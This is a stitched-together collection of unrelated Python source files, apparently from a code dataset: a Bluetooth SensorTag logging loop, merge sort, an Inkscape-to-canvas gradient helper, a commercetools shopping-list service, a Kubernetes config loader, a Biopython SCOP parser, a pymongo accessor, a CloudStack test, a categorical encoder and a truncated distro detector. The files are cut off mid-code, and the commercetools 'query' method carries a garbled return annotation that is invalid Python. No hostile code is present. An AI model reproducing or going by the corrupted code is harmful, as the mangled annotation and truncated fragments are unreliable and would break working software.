    gyro_z_dps = (((float)(int(gyro_z, 16))) * 1.0) / (65536.0 / 500.0)
    acc_range = 16.0 # turning on handle to 0xffff sets to 16
    acc_x_mps = (((float)(int(acc_x, 16))) * 1.0) / (32768.0 / acc_range)
    acc_y_mps = (((float)(int(acc_y, 16))) * 1.0) / (32768.0 / acc_range)
    acc_z_mps = (((float)(int(acc_z, 16))) * 1.0) / (32768.0 / acc_range)
    mag_x_ut = ((float)(int(mag_x, 16))) * 1.0
    mag_y_ut = ((float)(int(mag_y, 16))) * 1.0
    mag_z_ut = ((float)(int(mag_z, 16))) * 1.0
    log("MOVEMENT")
    log("\tGYROSCOPE\t: " + "X: " + str(gyro_x_dps) + "°/s" + " | " + "Y: " + str(gyro_y_dps) + "°/s" + " | " + "Z: " + str(gyro_z_dps) + "°/s")
    log("\tACCELEROMETER\t: " + "X: " + str(acc_x_mps) + "m/s" + " | " + "Y: " + str(acc_y_mps) + "m/s" + " | " + "Z: " + str(acc_z_mps) + "m/s")
    log("\tMAGNETOMETER\t: " + "X: " + str(mag_x_ut) + "µT" + " | " + "Y: " + str(mag_y_ut) + "µT" + " | " + "Z: " + str(mag_z_ut) + "µT")

def print_humd_data(value):
    # Decode the HDC1000 humidity characteristic: temperature word then
    # humidity word; the low 2 humidity bits are status and are masked off.
    value = value.split(" ")
    temp = "0x" + value[1] + value[0]
    humd = "0x" + value[3] + value[2]
    temp_cel = ((float)(int(temp, 16))) / 65536.0 * 165.0 - 40.0
    temp_fah = temp_cel * (9.0/5.0) + 32.0
    humd_rel = (float)(int(humd, 16) & ~0x0003) / 65536.0 * 100.0
    log("HUMIDITY")
    log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
    log("\tHUMDITY\t\t: " + str(humd_rel) + "%")

def print_baro_data(value):
    # Decode the BMP280 characteristic: 24-bit temperature then 24-bit
    # pressure, both scaled by 100.
    value = value.split(" ")
    temp = "0x" + value[2] + value[1] + value[0]
    baro = "0x" + value[5] + value[4] + value[3]
    temp_cel = ((float)(int(temp, 16))) / 100.0
    temp_fah = temp_cel * (9.0/5.0) + 32.0
    baro_hpa = ((float)(int(baro, 16))) / 100.0
    baro_kpa = baro_hpa / 10.0
    log("BAROMETER")
    log("\tTEMPERATURE\t: " + str(temp_cel) + "°C" + " | " + str(temp_fah) + "°F")
    log("\tPRESSURE\t: " + str(baro_kpa) + "kPa" + " | " + str(baro_hpa) + "hPa")

def print_opti_data(value):
    # Decode the OPT3001 characteristic: 12-bit mantissa m, 4-bit
    # exponent e; lux = m * 0.01 * 2^e.
    value = value.split(" ")
    opti = "0x" + value[1] + value[0]
    m = int(opti, 16) & 0x0FFF
    e = (int(opti, 16) & 0xF000) >> 12
    if (e == 0):
        e = 1
    else:
        e = 2 << (e - 1)
    opti_lux = m * (0.01 * e)
    log("OPTICAL")
    log("\tLIGHT INTENSITY\t: " + str(opti_lux) + "lux")
def turn_sensors_on():
    # Enable every active sensor; the movement sensor takes a 16-bit
    # config word (0xffff = all axes + 16g accel range, per the comment
    # in print_move_data), the others a single byte.
    for sensor in active_sensors:
        if sensor[1] == move_uuid[1]:
            turn_sensor_on(sensor[1], "ffff")
        else:
            turn_sensor_on(sensor[1], "01")

def turn_sensors_off():
    # Disable every active sensor (mirror of turn_sensors_on).
    for sensor in active_sensors:
        if sensor[1] == move_uuid[1]:
            turn_sensor_off(sensor[1], "0000")
        else:
            turn_sensor_off(sensor[1], "00")

def init_led():
    # Enable the LED service unless running in stealth mode.
    if not stealth_mode:
        turn_sensor_on(leds_uuid[1], "01")

def set_led(hnd):
    # Write a raw LED state byte (skipped entirely in stealth mode).
    if not stealth_mode:
        turn_sensor_on(leds_uuid[0], hnd)
# --- Startup: connect to the tag and discover its characteristics. ---
child = pexpect.spawn("gatttool -I")
child.sendline("connect " + sensor_mac)
child.expect(prompt)
child.sendline("characteristics")
child.expect(prompt)
child.before
child.expect(prompt)
characteristics = child.before
# Parse gatttool's characteristic listing into uuid -> value-handle map.
handles = characteristics.split("\r\n")
for i in handles:
    if len(i) >= 11:
        handle = i.replace(":", ",").split(", ")
        char_value_handle_value_index = handle.index("char value handle") + 1
        uuid_value_index = handle.index("uuid") + 1
        if handle[uuid_value_index] not in sensor_uuid_to_cvh:
            sensor_uuid_to_cvh[handle[uuid_value_index].upper()] = handle[char_value_handle_value_index].upper()
init_led()
# --- Main loop: sample every ~10 minutes (10 s warm-up + 590 s sleep),
# using the LED value as a coarse status indicator. ---
while (True):
    set_led("03")
    turn_sensors_on()
    set_led("01")
    # Give the sensors time to settle before the first read.
    time.sleep(10)
    log("===")
    log(str(datetime.now()))
    set_led("02")
    for sensor in active_sensors:
        if sensor[0] == temp_uuid[0]:
            print_temp_data(read_sensor_data(sensor[0]))
        if sensor[0] == move_uuid[0]:
            print_move_data(read_sensor_data(sensor[0]))
        if sensor[0] == humd_uuid[0]:
            print_humd_data(read_sensor_data(sensor[0]))
        if sensor[0] == baro_uuid[0]:
            print_baro_data(read_sensor_data(sensor[0]))
        if sensor[0] == opti_uuid[0]:
            print_opti_data(read_sensor_data(sensor[0]))
    set_led("03")
    # Power the sensors down between samples to save the tag's battery.
    turn_sensors_off()
    log("===")
    set_led("00")
    time.sleep(590)
182675 | <reponame>taddes/AlgoChallenge
def merge(left, right):
    """Merge two sorted lists into one sorted list.

    Fixes over the original: the leftover debug prints are removed, the
    inputs are no longer mutated, and index walking replaces list.pop(0)
    (which is O(n) per call, making the whole merge quadratic).
    """
    results = []
    i = j = 0
    while i < len(left) and j < len(right):
        if left[i] < right[j]:
            results.append(left[i])
            i += 1
        else:
            results.append(right[j])
            j += 1
    # At most one of the two tails is non-empty; append the leftovers.
    return [*results, *left[i:], *right[j:]]

print(merge([3, 8, 12], [5, 10, 15]))

def merge_sort(arr):
    """Top-down merge sort; returns a new sorted list.

    The base case is len(arr) <= 1 rather than == 1: the original
    recursed forever on an empty list.  Debug prints removed.
    """
    if len(arr) <= 1:
        return arr
    center = len(arr) // 2
    return merge(merge_sort(arr[0:center]), merge_sort(arr[center:]))

print(merge_sort([22, 3, 15, 13, 822, 14, 15, 22, 75,]))
10704 | <filename>ink2canvas/GradientHelper.py
from ink2canvas.lib.simpletransform import parseTransform
class GradientHelper(object):
def __init__(self, abstractShape):
self.abstractShape = abstractShape
def hasGradient(self, key):
style = self.abstractShape.getStyle()
if key in style:
styleParamater = style[key]
if styleParamater.startswith("url(#linear"):
return "linear"
if styleParamater.startswith("url(#radial"):
return "radial"
return None
def getGradientHref(self, key):
style = self.abstractShape.getStyle()
if key in style:
return style[key][5:-1]
return
def setGradientFill(self):
gradType = self.hasGradient("fill")
if (gradType):
gradient = self.setComponentGradient("fill", gradType)
self.abstractShape.canvasContext.setFill("gradient=grad")
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.fill();
self.abstractShape.canvasContext.restore()
return True
def setGradientStroke(self):
gradType = self.hasGradient("stroke")
if (gradType):
gradient = self.setComponentGradient("stroke", gradType)
self.abstractShape.canvasContext.setStroke("gradient=grad")
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.stroke();
self.abstractShape.canvasContext.restore()
return True
def hasGradientTransform(self, gradient):
return bool(gradient.attr("gradientTransform"))
def setGradientTransform(self, gradient):
dataString = gradient.attr("gradientTransform")
dataMatrix = parseTransform(dataString)
m11, m21, dx = dataMatrix[0]
m12, m22, dy = dataMatrix[1]
self.abstractShape.canvasContext.transform(m11, m12, m21, m22, dx, dy)
def setComponentGradient(self, key, gradType):
gradientId = self.getGradientHref(key)
if(gradType == "linear"):
gradient = self.abstractShape.rootTree.getLinearGradient(gradientId)
if(gradType == "radial"):
gradient = self.abstractShape.rootTree.getRadialGradient(gradientId)
if(gradient.link != None):
gradient.colorStops = self.abstractShape.rootTree.getLinearGradient(gradient.link).colorStops
if(self.hasGradientTransform(gradient)):
self.abstractShape.canvasContext.save()
self.setGradientTransform(gradient)
if(gradType == "linear"):
x1, y1, x2, y2 = gradient.getData()
self.abstractShape.canvasContext.createLinearGradient("grad", x1, y1, x2, y2)
if(gradType == "radial"):
cx, cy, fx, fy, r = gradient.getData()
self.abstractShape.canvasContext.createRadialGradient("grad", cx, cy, 0, fx, fy, r)
for stopKey, stopValue in gradient.colorStops.iteritems():
offset = float(stopKey)
color = self.abstractShape.canvasContext.getColor(stopValue.split(";")[0].split(":")[1] , stopValue.split(";")[1].split(":")[1] )
self.abstractShape.canvasContext.addColorStop("grad", offset, color)
return gradient
def createLinearGradient(self):
x1, y1, x2, y2 = self.gradient.getData()
self.abstractShape.canvasContext.createLinearGradient("grad", x1, y1, x2, y2)
for stop in self.gradient.stops:
color = self.canvasContext.getColor(stop.split(";")[0].split(":")[1] , stop.split(";")[1].split(":")[1])
offset = float(stop.split(";")[2].split(":")[1])
self.abstractShape.canvasContext.addColorStop("grad", offset, color) | StarcoderdataPython |
1616713 | <reponame>xRocketPowerx/python-sel-dedicated<filename>sel_dedicated/configuration.py
# coding: utf-8
"""
Seido User REST API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
The version of the OpenAPI document: 2.4.8
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
from sel_dedicated_codegen.configuration import Configuration as _Base
class Configuration(_Base):
    """Thin wrapper over the OpenAPI-generated Configuration class."""

    def auth_settings(self):
        """Return the auth settings dict used by the API client.

        :return: The Auth Settings information dict.
        """
        token_auth = {
            "in": "header",
            "key": "X-Token",
            "value": self.api_key["X-Token"],
        }
        return {"X_Token_Auth": token_auth}
| StarcoderdataPython |
27329 | <reponame>jeroenubbink/commercetools-python-sdk
# DO NOT EDIT! This file is automatically generated
import typing
from commercetools._schemas._shopping_list import (
ShoppingListDraftSchema,
ShoppingListPagedQueryResponseSchema,
ShoppingListSchema,
ShoppingListUpdateSchema,
)
from commercetools.helpers import RemoveEmptyValuesMixin
from commercetools.types._shopping_list import (
ShoppingList,
ShoppingListDraft,
ShoppingListPagedQueryResponse,
ShoppingListUpdate,
ShoppingListUpdateAction,
)
from commercetools.typing import OptionalListStr
from . import abstract, traits
# Request-parameter schemas for the shopping-list endpoints, composed
# from the shared trait mixins (expansion, sorting, paging, predicates).
class _ShoppingListQuerySchema(
    traits.ExpandableSchema,
    traits.SortableSchema,
    traits.PagingSchema,
    traits.QuerySchema,
):
    pass


# Parameters accepted by update requests (expand + version).
class _ShoppingListUpdateSchema(traits.ExpandableSchema, traits.VersionedSchema):
    pass


# Parameters accepted by delete requests (version + expand + dataErasure).
class _ShoppingListDeleteSchema(
    traits.VersionedSchema, traits.ExpandableSchema, traits.DataErasureSchema
):
    pass
class ShoppingListService(abstract.AbstractService):
    """Service for shopping lists, e.g. for wishlist support.

    Generated code (see file header); each method serializes its keyword
    parameters through the matching schema and issues one HTTP request.
    """

    def get_by_id(self, id: str, *, expand: OptionalListStr = None) -> ShoppingList:
        """Gets a shopping list by ID."""
        params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
        return self._client._get(
            endpoint=f"shopping-lists/{id}",
            params=params,
            schema_cls=ShoppingListSchema,
        )

    def get_by_key(self, key: str, *, expand: OptionalListStr = None) -> ShoppingList:
        """Gets a shopping list by Key."""
        params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
        return self._client._get(
            endpoint=f"shopping-lists/key={key}",
            params=params,
            schema_cls=ShoppingListSchema,
        )

    def query(
        self,
        *,
        expand: OptionalListStr = None,
        sort: OptionalListStr = None,
        limit: int = None,
        offset: int = None,
        with_total: bool = None,
        where: OptionalListStr = None,
        predicate_var: typing.Dict[str, str] = None,
    ) -> ShoppingList PagedQueryResponse if False else ShoppingListPagedQueryResponse:
        """Query shopping lists with optional predicates, sorting and paging."""
        params = self._serialize_params(
            {
                "expand": expand,
                "sort": sort,
                "limit": limit,
                "offset": offset,
                "withTotal": with_total,
                "where": where,
                "predicate_var": predicate_var,
            },
            _ShoppingListQuerySchema,
        )
        return self._client._get(
            endpoint="shopping-lists",
            params=params,
            schema_cls=ShoppingListPagedQueryResponseSchema,
        )

    def create(
        self, draft: ShoppingListDraft, *, expand: OptionalListStr = None
    ) -> ShoppingList:
        """Create a new shopping list from a draft."""
        params = self._serialize_params({"expand": expand}, traits.ExpandableSchema)
        return self._client._post(
            endpoint="shopping-lists",
            params=params,
            data_object=draft,
            request_schema_cls=ShoppingListDraftSchema,
            response_schema_cls=ShoppingListSchema,
        )

    def update_by_id(
        self,
        id: str,
        version: int,
        actions: typing.List[ShoppingListUpdateAction],
        *,
        expand: OptionalListStr = None,
        force_update: bool = False,
    ) -> ShoppingList:
        """Apply update actions to a shopping list found by its ID."""
        params = self._serialize_params({"expand": expand}, _ShoppingListUpdateSchema)
        update_action = ShoppingListUpdate(version=version, actions=actions)
        return self._client._post(
            endpoint=f"shopping-lists/{id}",
            params=params,
            data_object=update_action,
            request_schema_cls=ShoppingListUpdateSchema,
            response_schema_cls=ShoppingListSchema,
            force_update=force_update,
        )

    def update_by_key(
        self,
        key: str,
        version: int,
        actions: typing.List[ShoppingListUpdateAction],
        *,
        expand: OptionalListStr = None,
        force_update: bool = False,
    ) -> ShoppingList:
        """Update a shopping list found by its Key."""
        params = self._serialize_params({"expand": expand}, _ShoppingListUpdateSchema)
        update_action = ShoppingListUpdate(version=version, actions=actions)
        return self._client._post(
            endpoint=f"shopping-lists/key={key}",
            params=params,
            data_object=update_action,
            request_schema_cls=ShoppingListUpdateSchema,
            response_schema_cls=ShoppingListSchema,
            force_update=force_update,
        )

    def delete_by_id(
        self,
        id: str,
        version: int,
        *,
        expand: OptionalListStr = None,
        data_erasure: bool = None,
        force_delete: bool = False,
    ) -> ShoppingList:
        """Delete a shopping list by ID at the given version."""
        params = self._serialize_params(
            {"version": version, "expand": expand, "dataErasure": data_erasure},
            _ShoppingListDeleteSchema,
        )
        return self._client._delete(
            endpoint=f"shopping-lists/{id}",
            params=params,
            response_schema_cls=ShoppingListSchema,
            force_delete=force_delete,
        )

    def delete_by_key(
        self,
        key: str,
        version: int,
        *,
        expand: OptionalListStr = None,
        data_erasure: bool = None,
        force_delete: bool = False,
    ) -> ShoppingList:
        """Delete a shopping list by Key at the given version."""
        params = self._serialize_params(
            {"version": version, "expand": expand, "dataErasure": data_erasure},
            _ShoppingListDeleteSchema,
        )
        return self._client._delete(
            endpoint=f"shopping-lists/key={key}",
            params=params,
            response_schema_cls=ShoppingListSchema,
            force_delete=force_delete,
        )
17018 | import logging
import os
import cltl.combot.infra.config.local as local_config
logger = logging.getLogger(__name__)

# Directory where kubernetes mounts the config-map files, and the local
# config file they are flattened into (one INI section per map file).
K8_CONFIG_DIR = "/cltl_k8_config"
K8_CONFIG = "config/k8.config"
class K8LocalConfigurationContainer(local_config.LocalConfigurationContainer):
    """Local configuration container that additionally flattens kubernetes
    config maps into an INI file and loads it as an extra config source."""

    @staticmethod
    def load_configuration(config_file=local_config.CONFIG, additional_config_files=local_config.ADDITIONAL_CONFIGS,
                           k8_configs=K8_CONFIG_DIR, k8_config_file=K8_CONFIG):
        """Load configuration, appending the kubernetes config file when the
        config-map directory is readable (otherwise just log a warning).

        Bug fix: the original did ``configs = additional_config_files``
        followed by ``configs += [...]``, which mutated the *default* list
        (local_config.ADDITIONAL_CONFIGS) in place, so the k8 config file
        was appended again on every successful call.  Copying first keeps
        the caller's/default list untouched.
        """
        configs = list(additional_config_files)
        try:
            copy_k8_config(k8_configs, k8_config_file)
            configs.append(k8_config_file)
        except OSError:
            logger.warning("Could not load kubernetes config map from %s to %s", k8_configs, k8_config_file)

        local_config.LocalConfigurationContainer.load_configuration(config_file, configs)
def copy_k8_config(k8_config_dir, k8_config_file):
    """Flatten the kubernetes config-map files in *k8_config_dir* into the
    single INI-style file *k8_config_file*, one section per map file."""
    visible = tuple(entry for entry in os.listdir(k8_config_dir) if not entry.startswith("."))
    logger.debug("Found kubernetes config maps %s in %s", visible, k8_config_dir)

    # Read everything first, so a read failure cannot leave a truncated
    # output file behind; dict order preserves the listing order.
    sections = {name: _read_config(k8_config_dir, name) for name in visible}

    with open(k8_config_file, 'w') as k8_cfg:
        logger.info("Writing %s", k8_cfg)
        for name, body in sections.items():
            k8_cfg.write(f"[{name}]\n")
            k8_cfg.write(body)
            k8_cfg.write("\n")


def _read_config(k8_configs, config_file):
    """Return the full text of one config-map file."""
    logger.info("Loading %s/%s", k8_configs, config_file)
    path = os.path.join(k8_configs, config_file)
    with open(path) as cfg:
        return cfg.read()
4827416 | # Copyright 2001 by <NAME>. All rights reserved.
# Modifications Copyright 2010 <NAME>. All rights reserved.
#
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Handle the SCOP CLAssification file, which describes SCOP domains.
The file format is described in the scop
"release notes.":http://scop.mrc-lmb.cam.ac.uk/scop/release-notes.html
The latest CLA file can be found
"elsewhere at SCOP.":http://scop.mrc-lmb.cam.ac.uk/scop/parse/
"Release 1.73": http://scop.mrc-lmb.cam.ac.uk/scop/parse/dir.cla.scop.txt_1.73
(July 2008)
"""
from . import Residues
class Record(object):
    """Holds information for one SCOP domain.

    Attributes:
     - sid - SCOP identifier. e.g. d1danl2
     - residues - The domain definition as a Residues object
     - sccs - SCOP concise classification strings. e.g. b.1.2.1
     - sunid - SCOP unique identifier for this domain
     - hierarchy - A dictionary, keys are nodetype, values are sunid,
       describing the location of this domain in the SCOP hierarchy.

    """

    def __init__(self, line=None):
        """Initialize the class."""
        self.sid = ''
        self.residues = None
        self.sccs = ''
        self.sunid = ''
        self.hierarchy = {}
        if line:
            self._process(line)

    def _process(self, line):
        # Strip trailing whitespace, then split on tabs: the CLA format
        # has exactly six columns per domain line.
        line = line.rstrip()
        fields = line.split('\t')
        if len(fields) != 6:
            raise ValueError("I don't understand the format of %s" % line)
        self.sid, pdbid, residues, self.sccs, self.sunid, hierarchy = fields
        self.residues = Residues.Residues(residues)
        self.residues.pdbid = pdbid
        self.sunid = int(self.sunid)
        # The hierarchy column is "nodetype=sunid" pairs joined by commas.
        for assignment in hierarchy.split(","):
            nodetype, number = assignment.split('=')
            self.hierarchy[nodetype] = int(number)

    def __str__(self):
        parts = [self.sid]
        parts.extend(str(self.residues).split(" "))
        parts.append(self.sccs)
        parts.append(self.sunid)
        parts.append(','.join('%s=%s' % (nodetype, number)
                              for nodetype, number in self.hierarchy.items()))
        return "\t".join(map(str, parts)) + "\n"
def parse(handle):
    """Yield a Record for every non-comment line of a CLA file.

    Arguments:
     - handle - file-like object.
    """
    for raw_line in handle:
        # '#' lines are comments; everything else is a domain record.
        if not raw_line.startswith('#'):
            yield Record(raw_line)
class Index(dict):
    """A CLA file indexed by SCOP identifiers for rapid random access.

    Maps each record's sid to the byte offset of its line, so
    ``index[sid]`` can seek straight to the record and re-parse it.
    """

    def __init__(self, filename):
        """Create CLA index.

        Arguments:
         - filename - The file to index
        """
        dict.__init__(self)
        self.filename = filename
        # "rU" was deprecated and removed in Python 3.11; plain "r"
        # already gives universal-newline behaviour in Python 3.
        with open(self.filename, "r") as f:
            position = 0
            while True:
                line = f.readline()
                if not line:
                    break
                if not line.startswith('#'):
                    record = Record(line)
                    key = record.sid
                    if key is not None:
                        self[key] = position
                # Always advance past the line just read. The original
                # skipped this for '#' lines, so a record following a
                # comment was indexed at the comment's offset.
                position = f.tell()

    def __getitem__(self, key):
        """Return the Record stored at the indexed file offset."""
        position = dict.__getitem__(self, key)
        with open(self.filename, "r") as f:
            f.seek(position)
            line = f.readline()
        record = Record(line)
        return record
| StarcoderdataPython |
1743006 | import bson
from env import pymongo_env
class SinglePymongoDocument(object):
    """A database accessor for a single document."""

    def __init__(self, doc_id=None, id_field=None, document=None, collection=None):
        """Initializes the SinglePymongoDocument.

        The document with id 'doc_id' is used from the given 'collection'.

        Args:
          doc_id: The id of the document to use, or None to insert a new one.
          id_field: The name of the field to copy the id to if a new doc is created.
          document: The document to initialize with if one does not exist.
          collection: The database collection to use.
        """
        # Use the default public database if no collection is specified.
        if collection is None:
            collection = pymongo_env.PUBLIC_DB['test_collection']
        self._collection = collection
        if document is None:
            document = {}
        # Only coerce to ObjectId when an id was actually supplied.
        # ObjectId(str(None)) would raise InvalidId, which previously made
        # the "insert a new document" branch below unreachable.
        if doc_id is not None:
            doc_id = bson.objectid.ObjectId(str(doc_id))
        if doc_id is None:
            # Insert a new document and mirror the generated id into
            # id_field (when one was requested).
            result_id = collection.insert_one(document).inserted_id
            self._doc = {'_id': result_id}
            if id_field is not None:
                collection.update_one(
                    self._doc, {'$set': {id_field: str(result_id)}})
        else:
            # Check if there already exists a document with 'doc_id'.
            self._doc = {'_id': doc_id}
            result = collection.find_one(self._doc)
            if result is None:
                # Create the document with the given id.
                document_with_id = {
                    '_id': doc_id
                }
                document_with_id.update(document)
                if id_field is not None:
                    document_with_id[id_field] = doc_id
                collection.insert_one(document_with_id)

    def UpdateDocument(self, update):
        """Updates the document with 'update' pymongo dict."""
        return self._collection.update_one(self._doc, update)

    def UpdateFields(self, update):
        """Updates the document with the field/valules in 'update'."""
        return self._collection.update_one(self._doc, {'$set': update})

    def GetDocument(self):
        """Returns the document."""
        return self._collection.find_one(self._doc)

    def ReplaceDocument(self, replacement):
        """Replaces the document with 'document'."""
        return self._collection.replace_one(self._doc, replacement)

    def DeleteDocument(self):
        """Deletes the document."""
        return self._collection.find_one_and_delete(self._doc)
| StarcoderdataPython |
3346418 | <filename>desktop/core/ext-py/guppy-0.1.10/guppy/sets/__init__.py
#._cv_part guppy.sets
from setsc import BitSet # base bitset type
from setsc import ImmBitSet # immutable bitset type
from setsc import immbit # immutable bitset singleton constructor
from setsc import immbitrange # immutable bitset range constructor
from setsc import immbitset # immutable bitset constructor
from setsc import MutBitSet # mutable bitset
from setsc import NodeSet # base nodeset type
from setsc import ImmNodeSet # immmutable nodeset type
from setsc import MutNodeSet # mutable nodeset type
import copy_reg
from setsc import _bs
if hasattr(copy_reg, 'safe_constructors'): # < 2.3 version
copy_reg.safe_constructors[_bs] = 1
else:
# In at least Python 2.3.3, we have to set __module__;
# it didn't find it otherwise.
_bs.__module__ # Due to bug in Python version 2.3.3, we have to read it first..
_bs.__module__= 'guppy.sets' # ..to be able to set it.
del copy_reg
# Define some constructors.
# Constructor names are lower case.
# Some constructors are equal to types.
# But this connection depends on the implementation.
# So one may wish the user to not depend on this.
mutbitset = MutBitSet
immnodeset = ImmNodeSet
mutnodeset = MutNodeSet
def mutnodeset_union(iterable):
    "Return a mutable nodeset which is the union of all nodesets in iterable."
    # Accumulate via in-place union; avoids shadowing the builtin `set`.
    union = mutnodeset()
    for nodeset in iterable:
        union |= nodeset
    return union
def immnodeset_union(iterable, *args):
    "Return an immmutable nodeset which is the union of all nodesets in iterable."
    # Build mutably, then freeze with any extra constructor arguments.
    return immnodeset(mutnodeset_union(iterable), *args)
def laxnodeset(v):
    """\
Return a nodeset with elements from the argument. If the argument is
already a nodeset, it self will be returned. Otherwise it will be
converted to a nodeset, that can be mutable or immutable depending on
what happens to be most effectively implemented."""
    if isinstance(v, NodeSet):
        return v
    return immnodeset(v)
# Make attributes assignable by reading one;
# this is getting around a bug in Python 2.3.3
# and should be harmless in any version.
try:
mutnodeset()._hiding_tag_
except AttributeError:
pass
| StarcoderdataPython |
1754423 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" P1 tests for Scaling up Vm
"""
#Import Local Modules
import marvin
from marvin.cloudstackTestCase import *
from marvin.cloudstackAPI import *
from marvin.sshClient import SshClient
from marvin.lib.utils import *
from marvin.lib.base import *
from marvin.lib.common import *
from nose.plugins.attrib import attr
#Import System modules
import time
_multiprocess_shared_ = True
class TestResourceDetail(cloudstackTestCase):
    # Integration test: verifies that a resource detail removed from a
    # Volume no longer appears in listResourceDetails.

    @classmethod
    def setUpClass(cls):
        # Shared fixture: one account, one disk offering and one volume,
        # created once for the whole test class.
        testClient = super(TestResourceDetail, cls).getClsTestClient()
        cls.apiclient = testClient.getApiClient()
        cls.services = testClient.getParsedTestDataConfig()
        # Get Zone, Domain and templates
        domain = get_domain(cls.apiclient)
        zone = get_zone(cls.apiclient, testClient.getZoneForTests())
        cls.services['mode'] = zone.networktype
        # Set Zones and disk offerings ??
        # Create account, service offerings, vm.
        cls.account = Account.create(
            cls.apiclient,
            cls.services["account"],
            domainid=domain.id
            )
        cls.disk_offering = DiskOffering.create(
            cls.apiclient,
            cls.services["disk_offering"]
            )
        #create a volume
        cls.volume = Volume.create(
            cls.apiclient,
            { "diskname" : "ndm"},
            zoneid=zone.id,
            account=cls.account.name,
            domainid=cls.account.domainid,
            diskofferingid=cls.disk_offering.id
            )
        # Resources listed here are deleted (in order) by tearDownClass.
        cls._cleanup = [
            cls.volume,
            cls.account
            ]

    @classmethod
    def tearDownClass(cls):
        cls.apiclient = super(TestResourceDetail, cls).getClsTestClient().getApiClient()
        cleanup_resources(cls.apiclient, cls._cleanup)
        return

    def setUp(self):
        self.apiclient = self.testClient.getApiClient()
        self.dbclient = self.testClient.getDbConnection()
        self.cleanup = []

    def tearDown(self):
        #Clean up, terminate the created ISOs
        cleanup_resources(self.apiclient, self.cleanup)
        return

    @attr(tags = ["advanced", "xenserver"], required_hardware="false")
    def test_01_updatevolumedetail(self):
        """Test volume detail
        """
        # Validate the following
        #remove detail
        self.debug("Testing REMOVE volume detail Volume-ID: %s " % (
                                                self.volume.id
                                                ))
        cmd = removeResourceDetail.removeResourceDetailCmd()
        cmd.resourcetype = "Volume"
        cmd.resourceid = self.volume.id
        self.apiclient.removeResourceDetail(cmd)
        # After removal the list API should return no details at all.
        listResourceDetailCmd = listResourceDetails.listResourceDetailsCmd()
        listResourceDetailCmd.resourceid = self.volume.id
        listResourceDetailCmd.resourcetype = "Volume"
        listResourceDetailResponse = self.apiclient.listResourceDetails(listResourceDetailCmd)
        self.assertEqual(listResourceDetailResponse, None, "Check if the list API \
                            returns an empty response")
        #TODO - add detail. Map as input
        return
| StarcoderdataPython |
3236060 | <filename>categorical.py
import math
import pandas as pd
class CategoricalConverter:
    """Map raw values to integer or binary categorical codes.

    ``fit`` assigns every distinct value an integer code. ``None`` is
    always present and gets code 0, so real values start at 1.
    ``transform`` then replaces DataFrame cells with those codes, either
    as plain integers or expanded into one column per binary digit.

    Parameters
    ----------
    binary (boolean) : expand codes into binary digit columns [True]

    Attributes
    ----------
    binary_length_ : number of binary digits per code (binary mode only)
    sr_categorical_mapper : pd.Series of codes (fit values as index)

    Examples
    --------
    >>> cat_conv = CategoricalConverter(binary=False)
    >>> cat_conv.fit(['T', 'K', '9', 'C', 'I'])
    >>> cat_conv.transform(pd.DataFrame(
            {'A': ['K', 'T', '9'], 'B': ['C', 'I', 'K']}))
       A  B
    0  2  4
    1  1  5
    2  3  2
    """

    def __init__(self, binary=True):
        self.values = None
        self.binary = binary
        self.binary_length_ = None
        self.sr_categorical_mapper = None

    def fit(self, values):
        """ Create the categorical mapping

        Args:
            values: values to be mapped to categoricals

        Returns:
            None. Updates `self` parameters.
        """
        # None is always prepended and maps to categorical code 0.
        self.values = [None] + list(dict.fromkeys(values))
        # Integer categorical codes, one per distinct value.
        codes = list(range(len(self.values)))
        self.sr_categorical_mapper = pd.Series(codes, index=self.values)
        if self.binary:
            # Smallest digit count able to encode every code in binary.
            self.binary_length_ = math.ceil(math.log2(len(codes)))
            self.sr_categorical_mapper = self.sr_categorical_mapper.apply(
                lambda v: '{0:b}'.format(v).zfill(self.binary_length_))

    def transform(self, df, cols=None, fillna=0):
        """ Transforms a dataframe to categorical dataframe

        Args:
            df: the dataframe to tranform

        Kwargs:
            cols (list) : columns of the dataframe to transform
                (all columns when omitted)
            fillna : digit used for null/unmapped cells in binary mode

        Return:
            DataFrame of integer codes, or one column per binary digit
            (suffixed ``_0`` .. ``_n``) in binary mode.
        """
        # if cols not supplied use all columns
        if not cols:
            cols = df.columns
        # work on a copy of the dataframe
        _df = df[cols].copy()
        df_new = pd.DataFrame(index=_df.index)  # index is important
        for col in cols:
            # NOTE: the previous `log.info(...)` call here referenced an
            # undefined name `log` and raised NameError on every call.
            col_categories = _df[col].map(self.sr_categorical_mapper)
            if self.binary:
                new_cols = ['{}_{}'.format(col, i) for i in range(
                    self.binary_length_)]
                # Split each binary string into one int per digit; cells
                # with no mapping become a row of `fillna` digits.
                df_binary = pd.DataFrame(
                    col_categories.apply(
                        lambda v: list(map(int, list(str(v))))
                        if not pd.isnull(v) else [fillna]*self.binary_length_
                    ).values.tolist(),
                    index=_df.index,  # index is important
                    columns=new_cols)
                df_new = df_new.join(
                    df_binary[df_binary.columns.difference(df_new.columns)])
            else:
                df_new.loc[:, col] = col_categories
        return df_new

    def fit_transform(self, values):
        """Fit on *values* and return their transformed representation."""
        self.fit(values)
        return self.transform(pd.DataFrame(values))

    def __repr__(self):
        return 'CategoricalConverter(binary={})'.format(self.binary)
| StarcoderdataPython |
1627963 | """User app."""
| StarcoderdataPython |
3339958 | <gh_stars>0
#!/usr/bin/env python3
import csv
import subprocess
def determine_distro():
    """Detect the running Linux distribution and cache it in `current_distro`.

    Leaves the module-level `current_distro` set to one of the column
    names used in Packages.csv ("ubuntu", "debian", "arch" or "fedora").
    No-op when the distro has already been detected.
    """
    global current_distro
    from platform import system
